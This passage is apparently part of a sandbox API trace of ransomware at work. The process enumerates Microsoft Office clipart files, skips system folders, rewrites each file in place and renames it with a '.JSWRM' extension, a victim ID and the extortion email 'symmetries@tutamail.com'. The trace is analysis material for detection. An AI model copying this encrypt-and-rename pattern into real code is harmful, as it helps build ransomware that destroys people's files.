-1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="system volume information") returned -1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="msocache") returned -1 [0076.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01761_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01761_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01761_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01761_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01761_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01761_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0076.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0076.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0076.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.593] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4148) returned 1 [0076.593] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1030) returned 0x23fc98 [0076.593] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1030, lpOverlapped=0x0) returned 1 [0076.598] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.598] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1030, lpOverlapped=0x0) returned 1 [0076.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.598] CloseHandle (hObject=0x314) returned 1 [0076.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0076.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0076.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0076.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0076.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.599] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0076.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0076.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0076.599] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01772_.WMF", cAlternateFileName="")) returned 1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2=".") returned 1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="..") returned 1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="...") returned 1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="windows") returned -1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="recovery") returned -1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="perflogs") returned -1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="documents and settings") returned -1 [0076.599] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.600] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="system volume information") returned -1 [0076.600] lstrcmpiW (lpString1="DD01772_.WMF", lpString2="msocache") returned -1 [0076.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01772_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01772_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01772_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0076.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01772_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01772_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01772_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0076.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0076.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0076.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0076.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.601] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2300) returned 1 [0076.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f0) returned 0x20c6c0 [0076.601] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0076.722] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.722] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0076.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0076.722] CloseHandle (hObject=0x314) returned 1 [0076.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0076.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0076.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0076.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0076.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0076.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0076.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0076.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0076.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0076.724] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01793_.WMF", cAlternateFileName="")) returned 1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2=".") returned 1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="..") returned 1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="...") returned 1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="windows") returned -1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="recovery") returned -1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="perflogs") returned -1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="documents and settings") returned -1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="system volume information") returned -1 [0076.724] lstrcmpiW (lpString1="DD01793_.WMF", lpString2="msocache") returned -1 [0076.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01793_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01793_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01793_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0076.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01793_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01793_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01793_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0076.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0076.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0076.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.725] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3252) returned 1 [0076.725] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcb0) returned 0x23fc98 [0076.725] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xcb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xcb0, lpOverlapped=0x0) returned 1 [0076.728] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.728] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xcb0, lpOverlapped=0x0) returned 1 [0076.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.729] CloseHandle (hObject=0x314) returned 1 [0076.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0076.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0076.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0076.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0076.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0076.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.729] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0076.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0076.730] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1815, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EAST_01.MID", cAlternateFileName="")) returned 1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2=".") returned 1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="..") returned 1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="...") returned 1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="windows") returned -1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="recovery") returned -1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="perflogs") returned -1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="documents and settings") returned 1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="system volume information") returned -1 [0076.730] lstrcmpiW (lpString1="EAST_01.MID", lpString2="msocache") returned -1 [0076.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0076.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAST_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAST_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EAST_01.MID", lpUsedDefaultChar=0x0) returned 11 [0076.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0076.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0076.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAST_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EAST_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EAST_01.MID", lpUsedDefaultChar=0x0) returned 11 [0076.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0076.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0076.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0076.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 